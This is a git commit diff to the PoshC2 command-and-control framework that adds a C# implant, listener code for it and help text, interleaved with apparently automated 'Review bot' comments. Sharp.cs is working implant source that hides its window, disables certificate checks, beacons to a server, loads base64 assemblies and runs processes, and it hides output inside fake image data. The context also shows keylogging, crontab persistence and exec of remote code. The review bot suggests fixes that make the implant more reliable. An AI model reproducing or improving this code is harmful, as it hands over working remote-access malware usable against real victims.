Added CSharp Implant/Dll/Shellcode - More functionality coming soon

chunking
benpturner 2018-12-27 12:10:46 +00:00
parent 971ef58e83
commit 190cb33288
15 changed files with 870 additions and 147 deletions


@ -2,7 +2,7 @@
from DB import *
from Config import *
import os
import os, base64
def check_module_loaded( module_name, randomuri, force=False ):
try:
@ -15,19 +15,19 @@ def check_module_loaded( module_name, randomuri, force=False ):
module = file.read()
new_task(("loadmodule %s" % module_name), randomuri)
if modules_loaded:
new_modules_loaded = "%s %s" % (modules_loaded, module_name)
new_modules_loaded = "%s %s" % (modules_loaded, module_name)
if module_name in modules_loaded:
loaded = "YES"
else:
for modname in os.listdir("%s/Modules/" % POSHDIR):
if modname.lower() in module_name.lower():
module_name = modname
file = open(("%sModules/%s" % (POSHDIR,module_name)), "r")
file = open(("%sModules/%s" % (POSHDIR,module_name)), "r")
module = file.read()
new_task(("loadmodule %s" % module_name), randomuri)
update_mods(new_modules_loaded, randomuri)
else:
new_modules_loaded = "%s" % (module_name)
new_modules_loaded = "%s" % (module_name)
file = open(("%sModules/%s" % (POSHDIR,module_name)), "r")
module = file.read()
new_task(("loadmodule %s" % module_name), randomuri)
@ -134,7 +134,7 @@ def run_autoloads(command, randomuri):
if "get-wmiregcachedrdpconnection" in command.lower(): check_module_loaded("powerview.ps1", randomuri)
if "get-wmiregmounteddrive" in command.lower(): check_module_loaded("powerview.ps1", randomuri)
if "invoke-wmievent" in command.lower(): check_module_loaded("Invoke-WMIEvent.ps1", randomuri)
if "remove-wmievent" in command.lower(): check_module_loaded("Invoke-WMIEvent.ps1", randomuri)
if "remove-wmievent" in command.lower(): check_module_loaded("Invoke-WMIEvent.ps1", randomuri)
if "invoke-wmi" in command.lower(): check_module_loaded("Invoke-WMIExec.ps1", randomuri)
if "get-lapspasswords" in command.lower(): check_module_loaded("Get-LAPSPasswords.ps1", randomuri)
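Review bot: The module files in `check_module_loaded` are opened with `file = open(...)` and never closed on any of the three paths shown, so every autoload leaks a handle; each pair should become `with open("%sModules/%s" % (POSHDIR, module_name), "r") as fh: module = fh.read()`. The new `import os, base64` line adds `base64`, which nothing in this hunk uses — presumably a later part of the file needs it, but it is worth checking it is not a stray import. `check_module_loaded` continues past the end of this hunk.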


@ -125,8 +125,24 @@ class MyHandler(BaseHTTPServer.BaseHTTPRequestHandler):
implant_type = "Daisy"
if s.path == ("%s?m" % new_implant_url):
implant_type = "OSX"
if s.path == ("%s?c" % new_implant_url):
implant_type = "C#"
if implant_type == "C#":
cookieVal = (s.cookieHeader).replace("SessionID=","")
decCookie = decrypt(KEY, cookieVal)
IPAddress = "%s:%s" % (s.client_address[0],s.client_address[1])
Domain,User,Hostname,Arch,PID,Proxy = decCookie.split(";")
newImplant = Implant(IPAddress, implant_type, Domain.decode("utf-8"), User.decode("utf-8"), Hostname.decode("utf-8"), Arch, PID, Proxy)
newImplant.save()
newImplant.display()
responseVal = encrypt(KEY, newImplant.SharpCore)
s.send_response(200)
s.send_header("Content-type", "text/html")
s.end_headers()
s.wfile.write(responseVal)
if implant_type == "OSX":
elif implant_type == "OSX":
cookieVal = (s.cookieHeader).replace("SessionID=","")
decCookie = decrypt(KEY, cookieVal)
IPAddress = "%s:%s" % (s.client_address[0],s.client_address[1])
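Review bot: The new C# branch unpacks the decrypted cookie with `Domain,User,Hostname,Arch,PID,Proxy = decCookie.split(";")` with no guard, and the `SessionID` cookie is whatever the remote client sent to the listener, so any value that does not decrypt to exactly six `;`-separated fields raises an unhandled `ValueError` inside `MyHandler` rather than a quiet 404/400; wrap the decrypt-and-split in a `try` and fall through to a generic response on failure. The sixth field is also misnamed: `primer()` in Files/Sharp.cs builds the cookie as `{dn};{u};{cn};{arch};{pid};#REPLACEBASEURL#`, so what lands in the `Proxy` column is the base URL, not a proxy setting — either rename the field or have the implant send its proxy URL there. The `decrypt` call silently relies on the first CBC block being discarded (see Core.py), which is fine but worth a one-line comment here. The `OSX` branch this sits next to continues past the end of the hunk.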

20
Core.py

@ -11,7 +11,7 @@ def formStr(varstr, instr):
holder = []
str1 = ''
str2 = ''
str1 = varstr + ' = "' + instr[:56] + '"'
str1 = varstr + ' = "' + instr[:56] + '"'
for i in xrange(56, len(instr), 48):
holder.append('"'+instr[i:i+48])
str2 = '"\r\n'.join(holder)
@ -24,7 +24,7 @@ def formStrMacro(varstr, instr):
holder = []
str1 = ''
str2 = ''
str1 = varstr + ' = "' + instr[:54] + '"'
str1 = varstr + ' = "' + instr[:54] + '"'
for i in xrange(54, len(instr), 48):
holder.append(varstr + ' = '+ varstr +' + "'+instr[i:i+48])
str2 = '"\r\n'.join(holder)
@ -38,13 +38,17 @@ def load_module(module_name):
file = codecs.open(("%sModules/%s" % (POSHDIR,module_name)), 'r', encoding='utf-8-sig')
return file.read()
def load_module_sharp(module_name):
file = open(("%sModules/%s" % (POSHDIR,module_name)), 'r+b')
return base64.b64encode(file.read())
def get_images():
dir_path = os.path.dirname(os.path.realpath(__file__))
rootimagedir = "%s/Images/" % dir_path
images = ""
for root, dirs, filenames in os.walk(rootimagedir):
count = 1
for f in filenames:
for f in filenames:
if count == 5:
with open(rootimagedir+f, "rb") as image_file:
image = image_file.read()
@ -65,21 +69,21 @@ def gen_key():
def randomuri(size = 15, chars=string.ascii_letters + string.digits):
return ''.join(random.choice(chars) for _ in range(size))
# Decrypt a string from base64 encoding
# Decrypt a string from base64 encoding
def get_encryption( key, iv='0123456789ABCDEF' ):
from Crypto.Cipher import AES
iv = os.urandom(AES.block_size)
aes = AES.new( base64.b64decode(key), AES.MODE_CBC, iv )
return aes
# Decrypt a string from base64 encoding
# Decrypt a string from base64 encoding
def decrypt( key, data ):
iv = data[0:16]
aes = get_encryption(key, iv)
data = aes.decrypt( base64.b64decode(data) )
return data[16:]
# Decrypt a string from base64 encoding
# Decrypt a string from base64 encoding
def decrypt_bytes_gzip( key, data):
iv = data[0:16]
aes = get_encryption(key, iv)
@ -100,7 +104,7 @@ def encrypt( key, data, gzip=False ):
out = StringIO.StringIO()
with gzip.GzipFile(fileobj=out, mode="w") as f:
f.write(data)
data = out.getvalue()
data = out.getvalue()
# Pad with zeros
mod = len(data) % 16
@ -111,4 +115,4 @@ def encrypt( key, data, gzip=False ):
data = aes.IV + aes.encrypt( data )
if not gzip:
data = base64.b64encode( data )
return data
return data
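Review bot: `load_module_sharp` opens the assembly with mode `'r+b'` (read-write) and never closes the handle; it only reads, so it should be `with open("%sModules/%s" % (POSHDIR, module_name), 'rb') as fh: return base64.b64encode(fh.read())`. The reindented `# Decrypt a string from base64 encoding` comment above `get_encryption` is wrong for that function, which builds an AES-CBC cipher and overwrites its `iv` argument with `os.urandom(AES.block_size)`; `decrypt` then only works because the first decrypted block (the IV slot) comes out as garbage and is dropped by `data[16:]`. I would replace that comment with `# Build an AES-CBC cipher; the iv argument is ignored and a random IV is used, callers that decrypt rely on discarding the first block` so the next reader does not "fix" it. Note also that `encrypt` pads with zeros and attaches no MAC, so the ciphertext is malleable — acceptable for this protocol only because the key is pre-shared, and worth stating in the comment.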

506
Files/Sharp.cs Normal file

@ -0,0 +1,506 @@
using System;
using System.Linq;
using System.Net;
using System.Text;
using System.Text.RegularExpressions;
using System.Reflection;
using System.Threading;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.IO;
using System.IO.Compression;
//mono-csc /opt/PoshC2_Python_Git/Files/Sharp.cs -out:/tmp/Sharp.dll -target:library
//cat /tmp/Sharp.dll | base64 -w 0 | xclip
public class Program
{
[DllImport("kernel32.dll")]
static extern IntPtr GetConsoleWindow();
[DllImport("user32.dll")]
static extern bool ShowWindow(IntPtr hWnd, int nCmdShow);
public const int SW_HIDE = 0;
public const int SW_SHOW = 5;
public static void Sharp()
{
var handle = GetConsoleWindow();
ShowWindow(handle, SW_HIDE);
AllowUntrustedCertificates();
try { primer(); } catch {}
Thread.Sleep(300000);
try { primer(); } catch { }
Thread.Sleep(600000);
try { primer(); } catch { }
}
public static void Main()
{
Sharp();
}
static byte[] Combine(byte[] first, byte[] second)
{
byte[] ret = new byte[first.Length + second.Length];
Buffer.BlockCopy(first, 0, ret, 0, first.Length);
Buffer.BlockCopy(second, 0, ret, first.Length, second.Length);
return ret;
}
static System.Net.WebClient GetWebRequest(string cookie)
{
var x = new System.Net.WebClient();
string purl = "#REPLACEPROXYURL#";
string puser = "#REPLACEPROXYUSER#";
string ppass = "#REPLACEPROXYPASSWORD#";
if (!String.IsNullOrEmpty(purl)) {
WebProxy proxy = new WebProxy();
proxy.Address = new Uri(purl);
proxy.Credentials = new NetworkCredential(puser, ppass);
proxy.UseDefaultCredentials = false;
proxy.BypassProxyOnLocal = false;
x.Proxy = proxy;
}
string df = "#REPLACEDF#";
if (!String.IsNullOrEmpty(df)) {
x.Headers.Add("Host",df);
}
x.Headers.Add("User-Agent", "#REPLACEUSERAGENT#");
x.Headers.Add("Referer", "#REPLACEREFERER#");
if (cookie != null)
{
x.Headers.Add(System.Net.HttpRequestHeader.Cookie, $"SessionID={cookie}");
}
return x;
}
static string Decryption(string key, string enc)
{
var b = System.Convert.FromBase64String(enc);
Byte[] IV = new Byte[16];
Array.Copy(b, IV, 16);
try {
var a = CAMR(key, System.Convert.ToBase64String(IV));
var d = a.CreateDecryptor();
var u = d.TransformFinalBlock(b, 16, b.Length - 16);
return System.Text.Encoding.UTF8.GetString(u);
} catch {
var a = CAMA(key, System.Convert.ToBase64String(IV));
var d = a.CreateDecryptor();
var u = d.TransformFinalBlock(b, 16, b.Length - 16);
return System.Text.Encoding.UTF8.GetString(u);
}
}
static string Encryption(string key, string un, bool comp = false)
{
var b = System.Text.Encoding.UTF8.GetBytes(un);
byte[] byEnc = b;
if (comp){
byEnc = Compress(b);
}
try {
var a = CAMR(key, null);
var e = a.CreateEncryptor();
var f = e.TransformFinalBlock(byEnc, 0, byEnc.Length);
byte[] p = null;
p = Combine(a.IV, f);
return System.Convert.ToBase64String(p);
} catch {
var a = CAMA(key, null);
var e = a.CreateEncryptor();
var f = e.TransformFinalBlock(byEnc, 0, byEnc.Length);
byte[] p = null;
p = Combine(a.IV, f);
return System.Convert.ToBase64String(p);
}
}
static System.Security.Cryptography.AesCryptoServiceProvider CAMA(string key,string IV)
{
System.Security.Cryptography.AesCryptoServiceProvider b = new System.Security.Cryptography.AesCryptoServiceProvider();
b.Mode = System.Security.Cryptography.CipherMode.CBC;
b.Padding = System.Security.Cryptography.PaddingMode.Zeros;
b.BlockSize = 128;
b.KeySize = 256;
if (IV != null)
{
b.IV = System.Convert.FromBase64String(IV);
}
if (key != null)
{
b.Key = System.Convert.FromBase64String(key);
}
return b;
}
static System.Security.Cryptography.RijndaelManaged CAMR(string key,string IV)
{
System.Security.Cryptography.RijndaelManaged a = new System.Security.Cryptography.RijndaelManaged();
a.Mode = System.Security.Cryptography.CipherMode.CBC;
a.Padding = System.Security.Cryptography.PaddingMode.Zeros;
a.BlockSize = 128;
a.KeySize = 256;
if (IV != null)
{
a.IV = System.Convert.FromBase64String(IV);
}
if (key != null)
{
a.Key = System.Convert.FromBase64String(key);
}
return a;
}
static void AllowUntrustedCertificates()
{
try
{
System.Net.ServicePointManager.ServerCertificateValidationCallback = new System.Net.Security.RemoteCertificateValidationCallback(delegate { return true; } );
}
catch { }
}
static void primer()
{
DateTime now = DateTime.Now;
DateTime killDate = Convert.ToDateTime("#REPLACEKILLDATE#");
if (killDate < now){
System.Environment.Exit(1);
}
var u = System.Security.Principal.WindowsIdentity.GetCurrent().Name;
var dn = System.Environment.UserDomainName;
var cn = System.Environment.GetEnvironmentVariable("COMPUTERNAME");
var arch = System.Environment.GetEnvironmentVariable("PROCESSOR_ARCHITECTURE");
int pid = Process.GetCurrentProcess().Id;
Environment.CurrentDirectory = Environment.GetEnvironmentVariable("windir");
string o = $"{dn};{u};{cn};{arch};{pid};#REPLACEBASEURL#";
string key = "#REPLACEKEY#";
var pp = Encryption(key, o);
string baseURL = "#REPLACEBASEURL#";
string s = "#REPLACESTARTURL#";
var primer = GetWebRequest(pp).DownloadString(s);
var x = Decryption(key, primer);
Regex re = new Regex("RANDOMURI19901(.*)10991IRUMODNAR");
Match m = re.Match(x);
string RandomURI = m.Groups[1].ToString();
re = new Regex("URLS10484390243(.*)34209348401SLRU");
m = re.Match(x);
string URLS = m.Groups[1].ToString();
re = new Regex("KILLDATE1665(.*)5661ETADLLIK");
m = re.Match(x);
var KillDate = m.Groups[1].ToString();
re = new Regex("SLEEP98001(.*)10089PEELS");
m = re.Match(x);
var Sleep = m.Groups[1].ToString();
re = new Regex("NEWKEY8839394(.*)4939388YEKWEN");
m = re.Match(x);
var NewKey = m.Groups[1].ToString();
re = new Regex("IMGS19459394(.*)49395491SGMI");
m = re.Match(x);
var IMGs = m.Groups[1].ToString();
ImplantCore(baseURL, RandomURI, URLS, KillDate, Sleep, NewKey, IMGs);
}
static byte[] Compress(byte[] raw)
{
using (MemoryStream memory = new MemoryStream())
{
using (GZipStream gzip = new GZipStream(memory, CompressionMode.Compress, true))
{
gzip.Write(raw, 0, raw.Length);
}
return memory.ToArray();
}
}
static byte[] GetImgData(byte[] cmdoutput, string[] stringnewIMGS)
{
Random rnd = new Random();
string randimg = stringnewIMGS[rnd.Next(stringnewIMGS.Length)];
byte[] imgBytes = System.Convert.FromBase64String(randimg);
var maxByteslen = 1500;
var maxDatalen = 1500 + cmdoutput.Length;
var imageByteslen = imgBytes.Length;
var paddingByteslen = maxByteslen - imageByteslen;
var BytePadding = System.Text.Encoding.UTF8.GetBytes((RandomString(paddingByteslen)));
var ImageBytesFull = new byte[maxDatalen];
System.Array.Copy(imgBytes, 0, ImageBytesFull, 0, imgBytes.Length);
System.Array.Copy(BytePadding, 0, ImageBytesFull, imgBytes.Length, BytePadding.Length);
System.Array.Copy(cmdoutput, 0, ImageBytesFull, imgBytes.Length + BytePadding.Length, cmdoutput.Length);
return ImageBytesFull;
}
static Random random = new Random();
static string RandomString(int length)
{
const string chars = "...................@..........................Tyscf";
return new string(Enumerable.Repeat(chars, length).Select(s => s[random.Next(s.Length)]).ToArray());
}
static Type LoadSomething(string assemblyQualifiedName)
{
// Throws exception is type was not found
return Type.GetType(
assemblyQualifiedName,
(name) =>
{
// Returns the assembly of the type by enumerating loaded assemblies
// in the app domain
return AppDomain.CurrentDomain.GetAssemblies().Where(z => z.FullName == name.FullName).FirstOrDefault();
},
null,
true);
}
static void ImplantCore(string baseURL, string RandomURI, string stringURLS, string KillDate, string Sleep, string Key, string stringIMGS)
{
var re = new Regex("(?<=\")[^\"]*(?=\")|[^\" ]+");
string strURLS = stringURLS.Replace(",","");
var stringnewURLS = re.Matches(strURLS).Cast<Match>().Select(m => m.Value).ToArray();
stringnewURLS = stringnewURLS.Where(m => !string.IsNullOrEmpty(m)).ToArray();
string strIMGS = stringIMGS.Replace(",","");
var stringnewIMGS = re.Matches(strIMGS).Cast<Match>().Select(m => m.Value).ToArray();
stringnewIMGS = stringnewIMGS.Where(m => !string.IsNullOrEmpty(m)).ToArray();
int beacontime = 5;
if (!Int32.TryParse(Sleep, out beacontime))
{
beacontime = 5;
}
while(true)
{
Random rnd = new Random();
string URL = stringnewURLS[rnd.Next(stringnewURLS.Length)];
string G = (Guid.NewGuid()).ToString();
URL = baseURL+"/"+URL+G+"/?"+RandomURI;
Thread.Sleep(beacontime*1000);
DateTime now = DateTime.Now;
DateTime killDate = Convert.ToDateTime(KillDate);
if (killDate < now){
System.Environment.Exit(1);
}
var cmd = GetWebRequest(null).DownloadString(URL);
string output = "";
try {
string x = "";
try {
x = Decryption(Key, cmd);
x = x.Replace("\0", string.Empty);
} catch {}
using (System.IO.StreamWriter file = new System.IO.StreamWriter(@"C:\temp\log.txt", true))
{
file.WriteLine(x.ToString().TrimEnd());
}
if (x.ToLower().StartsWith("multicmd"))
{
string splitcmd = x.Replace("multicmd","");
string[] split = splitcmd.Split(new string[] {"!d-3dion@LD!-d"}, StringSplitOptions.RemoveEmptyEntries);
foreach (string c in split)
{
output = "";
//add download-file
//add upload-file
//add implant-core features, screenshot, tasklist, etc
if (c.ToLower() == "pwd") {
output = Directory.GetCurrentDirectory();
}
if (c.ToLower().StartsWith("dir") || c.ToLower().StartsWith("ls")){
string dirPath = "";
var stringOutput = new StringWriter();
Console.SetOut(stringOutput);
if (c.ToLower() == "dir" || c.ToLower() == "ls") {
dirPath = Directory.GetCurrentDirectory();
} else {
dirPath = Regex.Replace(c, "dir ", "", RegexOptions.IgnoreCase);
dirPath = Regex.Replace(c, "ls ", "", RegexOptions.IgnoreCase);
}
Console.WriteLine("Directory listing: {0} \r\n", dirPath);
string[] folderPaths = Directory.GetDirectories(dirPath, "*", SearchOption.TopDirectoryOnly);
foreach (var f in folderPaths)
{
try {
Console.WriteLine("d----- {0}", f.Normalize());
}
catch {}
}
string[] filePaths = Directory.GetFiles(dirPath, "*", SearchOption.TopDirectoryOnly);
foreach (var f in filePaths)
{
try {
Console.WriteLine("------ {0}", f.Normalize());
}
catch {}
}
output = stringOutput.ToString();
}
// load and execute assembly in current app domain
if (c.ToLower().StartsWith("loadmodule")){
//var stringOutput = new StringWriter();
//Console.SetOut(stringOutput);
string module = Regex.Replace(c, "loadmodule", "", RegexOptions.IgnoreCase);
Assembly assembly = System.Reflection.Assembly.Load(System.Convert.FromBase64String(module));
//var pop = assembly.GetType("Seatbelt.Program").InvokeMember("UserChecks", BindingFlags.InvokeMethod, null, null, null);
//output = stringOutput.ToString();
}
// list loaded assemblies
if (c.ToLower().StartsWith("listmodules")){
var appd = AppDomain.CurrentDomain.GetAssemblies();
foreach (var ass in appd)
{
output += ass.FullName.ToString() + "\n";
}
}
if (c.ToLower() == "ps"){
var loadedType = LoadSomething("ProcHandler, Get-ProcessList, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null");
var xxx = loadedType.Assembly.GetType("ProcHandler").InvokeMember("GetProcesses", BindingFlags.InvokeMethod, null, null, null);
output = xxx.ToString();
}
// run loaded assemblies
if (c.ToLower().StartsWith("run-assembly")){
string[] splitargs = c.Split(new string[] {" "}, StringSplitOptions.RemoveEmptyEntries);
string qualifiedname = splitargs[1];
string name = splitargs[2];
string method = splitargs[3];
var AppDomainAss = AppDomain.CurrentDomain.GetAssemblies();
foreach (var Ass in AppDomainAss)
{
if (Ass.FullName.ToString().ToLower().StartsWith(name.ToLower()))
{
var stringOutput = new StringWriter();
Console.SetOut(stringOutput);
var loadedType = LoadSomething(qualifiedname + ", " + Ass.FullName);
var xxx = loadedType.Assembly.GetType(qualifiedname).InvokeMember(method, BindingFlags.InvokeMethod, null, null, null);
output = stringOutput.ToString();
}
}
}
// try to load another app domain and unload each time
if (c.ToLower().StartsWith("loadmodule-appdomain")){
var stringOutput = new StringWriter();
Console.SetOut(stringOutput);
string module = Regex.Replace(c, "loadmodule", "", RegexOptions.IgnoreCase);
AppDomain dom = AppDomain.CreateDomain("RANDOM");
Assembly assembly = dom.Load(System.Convert.FromBase64String(module));
var pop = assembly.GetType("Seatbelt.Program").InvokeMember("UserChecks", BindingFlags.InvokeMethod, null, null, null);
output = stringOutput.ToString();
AppDomain.Unload(dom);
}
if (c.ToLower().StartsWith("exit")){
System.Environment.Exit(1);
}
if (c.ToLower().StartsWith("start-process")){
string proc = c.Replace("'", "");
proc = proc.Replace("\"", "");
string pstart = Regex.Replace(proc, "start-process ", "", RegexOptions.IgnoreCase);
pstart = Regex.Replace(pstart, "-argumentlist(.*)", "", RegexOptions.IgnoreCase);
string args = Regex.Replace(proc, "(.*)argumentlist ", "", RegexOptions.IgnoreCase);
Process p = new Process();
p.StartInfo.UseShellExecute = false;
p.StartInfo.RedirectStandardOutput = true;
p.StartInfo.RedirectStandardError = true;
p.StartInfo.CreateNoWindow = true;
p.StartInfo.FileName = pstart;
p.StartInfo.Arguments = args;
p.Start();
output = p.StandardOutput.ReadToEnd();
output = output + p.StandardError.ReadToEnd();
p.WaitForExit();
}
if (c.ToLower().StartsWith("setbeacon") || c.ToLower().StartsWith("beacon")) {
string beacon = Regex.Replace(c, "setbeacon ", "", RegexOptions.IgnoreCase);
beacon = Regex.Replace(beacon, "beacon ", "", RegexOptions.IgnoreCase);
if (beacon.ToLower().Contains("s"))
{
beacon = Regex.Replace(beacon, "s", "", RegexOptions.IgnoreCase);
if (!Int32.TryParse(beacon, out beacontime))
{
beacontime = 5;
}
}
else if (beacon.ToLower().Contains("m"))
{
beacon = Regex.Replace(beacon, "m", "", RegexOptions.IgnoreCase);
if (!Int32.TryParse(beacon, out beacontime))
{
beacontime = 5;
}
beacontime = beacontime * 60;
}
else if (beacon.ToLower().Contains("h"))
{
beacon = Regex.Replace(beacon, "h", "", RegexOptions.IgnoreCase);
if (!Int32.TryParse(beacon, out beacontime))
{
beacontime = 5;
}
beacontime = beacontime * 60;
beacontime = beacontime * 60;
}
else if (!Int32.TryParse(beacon, out beacontime))
{
beacontime = 5;
}
}
URL = stringnewURLS[rnd.Next(stringnewURLS.Length)];
G = (Guid.NewGuid()).ToString();
URL = baseURL+"/"+URL+G+"/?"+RandomURI;
string task = Encryption(Key, c);
string coutput = Encryption(Key, output, true);
byte[] outputBytes = System.Convert.FromBase64String(coutput);
byte[] sendBytes = GetImgData(outputBytes, stringnewIMGS);
GetWebRequest(task).UploadData(URL, sendBytes);
}
}
} catch (Exception e) {
URL = stringnewURLS[rnd.Next(stringnewURLS.Length)];
URL = baseURL+"/"+URL+RandomURI;
string task = Encryption(Key, "Error");
string eroutput = Encryption(Key, "Error: " + output + e, true);
byte[] outputBytes = System.Convert.FromBase64String(eroutput);
byte[] sendBytes = GetImgData(outputBytes, stringnewIMGS);
GetWebRequest(task).UploadData(URL, sendBytes);
}
}
}
}
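Review bot: Every decrypted task is appended in clear text to `C:\temp\log.txt` by the `using (System.IO.StreamWriter ...)` block in `ImplantCore` before any command is dispatched; besides leaving plaintext tasking on the target's disk, that write sits inside the outer `try`, so on a host without a `C:\temp` directory the `StreamWriter` constructor throws and every task is answered with the generic `Error` upload instead of being run — the four-line block looks like a leftover debug aid and should be removed. In the `dir`/`ls` branch the second replacement `dirPath = Regex.Replace(c, "ls ", "", RegexOptions.IgnoreCase);` starts again from `c` rather than from `dirPath`, so `dir c:\temp` reaches `Directory.GetDirectories` unchanged and throws; it should read `dirPath = Regex.Replace(dirPath, "ls ", "", RegexOptions.IgnoreCase);`. The `loadmodule` branch's `StartsWith("loadmodule")` test also matches a `loadmodule-appdomain` command, and its `Regex.Replace(c, "loadmodule", "")` then leaves `-appdomain` in front of the base64 passed to `Assembly.Load`, so both branches need an exact-prefix check before decoding. The error path in the `catch` builds the upload URL as `baseURL+"/"+URL+RandomURI`, omitting the GUID and `/?` the success path uses, which presumably means the server will not route it.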

34
Help.py

@ -1,13 +1,13 @@
#!/usr/bin/python
logopic = """__________ .__. _________ ________
\_______ \____ _____| |__ \_ ___ \ \_____ \
logopic = """ __________ .__. _________ ________
\_______ \____ _____| |__ \_ ___ \ \_____ \\
| ___/ _ \/ ___/ | \ / \ \/ / ____/
| | ( <_> )___ \| Y \ \ \____/ \
|____| \____/____ >___| / \______ /\_______ \
| | ( <_> )___ \| Y \ \ \____/ \\
|____| \____/____ >___| / \______ /\_______ \\
\/ \/ \/ \/
=============== v4.5 www.PoshC2.co.uk ============="""
=============== v4.6 www.PoshC2.co.uk ============="""
py_help1 = """
Implant Features:
@ -34,6 +34,26 @@ searchhelp mimikatz
back
"""
sharp_help1 = """
Implant Features:
=====================
ps
beacon 60s / beacon 10m / beacon 2h
ls/dir c:\\temp\\
pwd
loadmodule
loadmoduleforce
listmodule
run-assembly ProcHandler Get-ProcessList GetProcesses
start-process net -argumentlist users
kill-implant
hide-implant
unhide-implant
help
searchhelp listmodules
back
"""
posh_help1 = """
Implant Features:
=====================
@ -366,3 +386,5 @@ COMMANDS += ['invoke-psexecproxypayload','invoke-wmiproxypayload', 'invoke-dcomp
COMMANDS += ['invoke-psexecdaisypayload','invoke-wmidaisypayload', 'invoke-dcomdaisypayload']
UXCOMMANDS = ["unhide-implant","hide-implant","help","searchhelp","python","loadmodule","loadmoduleforce","get-keystrokes","back","upload-file","download-file","install-persistence","remove-persistence","sai","startanotherimplant-keepfile","get-screenshot","startanotherimplant","pwd","id","ps","setbeacon","kill-implant"]
SHARPCOMMANDS = ["unhide-implant","ls","pwd","dir","start-process", "hide-implant","help","searchhelp","listmodules","loadmodule","loadmoduleforce","back","ps","beacon","setbeacon","kill-implant"]
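Review bot: The new `sharp_help1` text advertises `listmodule`, while `SHARPCOMMANDS` and the implant's handler in Files/Sharp.cs both use `listmodules`, so an operator following the help will type a command the implant ignores; the help line should read `listmodules`. `run-assembly` is in the help and handled by the implant but missing from `SHARPCOMMANDS`, and `loadmoduleforce` is in both lists but has no handler in Sharp.cs — if `SHARPCOMMANDS` drives completion or validation (I cannot see its consumer here), those two should be reconciled in the same change.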


@ -31,6 +31,13 @@ class Implant(object):
self.ServerURL = new_serverurl = select_item("HostnameIP", "C2Server")
self.AllBeaconURLs = get_otherbeaconurls()
self.AllBeaconImages = get_images()
self.SharpCore = """
RANDOMURI19901%s10991IRUMODNAR
URLS10484390243%s34209348401SLRU
KILLDATE1665%s5661ETADLLIK
SLEEP98001%s10089PEELS
NEWKEY8839394%s4939388YEKWEN
IMGS19459394%s49395491SGMI""" % (self.RandomURI, self.AllBeaconURLs, self.KillDate, self.Sleep, self.Key, self.AllBeaconImages)
with open("%spy_dropper.py" % (PayloadsDirectory), 'rb') as f:
self.PythonImplant = base64.b64encode(f.read())
self.PythonCore = """import urllib2, os, subprocess, re, datetime, time, base64, string, random
@ -52,7 +59,7 @@ def keylog():
exec(modpayload)
pids = os.popen('ps aux | grep " ruby" | grep -v grep').read()
returnval = "%%s \\r\\nKeylogger started here: %%s" %% (pids, filename)
return returnval
return returnval
def dfile(fname):
if fname:
@ -102,7 +109,7 @@ def persist():
def remove_persist():
import subprocess as s
s.call("crontab -l | { cat; } | grep -v '_psh.sh'| crontab -", shell=True)
return "Removed user persistence via crontab: \\r\\n**must delete files manually**"
return "Removed user persistence via crontab: \\r\\n**must delete files manually**"
def decrypt_bytes_gzip( key, data):
iv = data[0:16]
@ -146,23 +153,23 @@ while(True):
for cmd in split:
if cmd[:10] == "$sleeptime":
timer = int(cmd.replace("$sleeptime = ",""))
elif cmd[:13] == "download-file":
elif cmd[:13] == "download-file":
fname = cmd.replace("download-file ","")
returnval = dfile(fname)
elif cmd[:11] == "upload-file":
returnval = dfile(fname)
elif cmd[:11] == "upload-file":
fullparams = cmd.replace("upload-file ","")
params = fullparams.split(":")
returnval = ufile(params[1],params[0])
elif cmd[:19] == "install-persistence":
returnval = persist()
elif cmd[:14] == "get-keystrokes":
returnval = ufile(params[1],params[0])
elif cmd[:19] == "install-persistence":
returnval = persist()
elif cmd[:14] == "get-keystrokes":
returnval = keylog()
elif cmd[:18] == "remove-persistence":
returnval = remove_persist()
elif cmd[:19] == "startanotherimplant":
elif cmd[:18] == "remove-persistence":
returnval = remove_persist()
elif cmd[:19] == "startanotherimplant":
returnval = sai(delfile=True)
elif cmd[:28] == "startanotherimplant-keepfile":
returnval = sai()
returnval = sai()
elif cmd[:10] == "loadmodule":
module = cmd.replace("loadmodule","")
exec(module)
@ -190,7 +197,7 @@ while(True):
returnval = "Error with source file: %%s" %% e
elif cmd[:6] == "python":
module = cmd.replace("python ","")
module = cmd.replace("python ","")
try:
import sys
import StringIO
@ -245,7 +252,7 @@ $payloadclear = @"
function DEC {${function:DEC}}
function ENC {${function:ENC}}
function CAM {${function:CAM}}
function Get-Webclient {${function:Get-Webclient}}
function Get-Webclient {${function:Get-Webclient}}
function Primer {${function:primer}}
`$primer = primer
if (`$primer) {`$primer| iex} else {
@ -272,14 +279,14 @@ function GetImgData($cmdoutput) {
try {$image = $icoimage|get-random}catch{}
function randomgen
function randomgen
{
param (
[int]$Length
)
$set = "...................@..........................Tyscf".ToCharArray()
$result = ""
for ($x = 0; $x -lt $Length; $x++)
for ($x = 0; $x -lt $Length; $x++)
{$result += $set | Get-Random}
return $result
}
@ -289,7 +296,7 @@ function GetImgData($cmdoutput) {
$imagebyteslen = $imageBytes.Length
$paddingbyteslen = $maxbyteslen - $imagebyteslen
$BytePadding = [System.Text.Encoding]::UTF8.GetBytes((randomgen $paddingbyteslen))
$ImageBytesFull = New-Object byte[] $maxdatalen
$ImageBytesFull = New-Object byte[] $maxdatalen
[System.Array]::Copy($imageBytes, 0, $ImageBytesFull, 0, $imageBytes.Length)
[System.Array]::Copy($BytePadding, 0, $ImageBytesFull,$imageBytes.Length, $BytePadding.Length)
[System.Array]::Copy($cmdoutput, 0, $ImageBytesFull,$imageBytes.Length+$BytePadding.Length, $cmdoutput.Length )
@ -340,10 +347,10 @@ function Encrypt-Bytes($key, $bytes) {
$gzipStream.Close()
$bytes = $output.ToArray()
$output.Close()
$aesManaged = Create-AesManagedObject $key
$encryptor = $aesManaged.CreateEncryptor()
$aesManaged = Create-AesManagedObject $key
$encryptor = $aesManaged.CreateEncryptor()
$encryptedData = $encryptor.TransformFinalBlock($bytes, 0, $bytes.Length)
[byte[]] $fullData = $aesManaged.IV + $encryptedData
[byte[]] $fullData = $aesManaged.IV + $encryptedData
$fullData
}
function Decrypt-String($key, $encryptedStringWithIV) {
@ -358,7 +365,7 @@ function Decrypt-String($key, $encryptedStringWithIV) {
function Encrypt-String2($key, $unencryptedString) {
$unencryptedBytes = [system.Text.Encoding]::UTF8.GetBytes($unencryptedString)
$CompressedStream = New-Object IO.MemoryStream
$DeflateStream = New-Object System.IO.Compression.GzipStream $CompressedStream, ([IO.Compression.CompressionMode]::Compress)
$DeflateStream = New-Object System.IO.Compression.GzipStream $CompressedStream, ([IO.Compression.CompressionMode]::Compress)
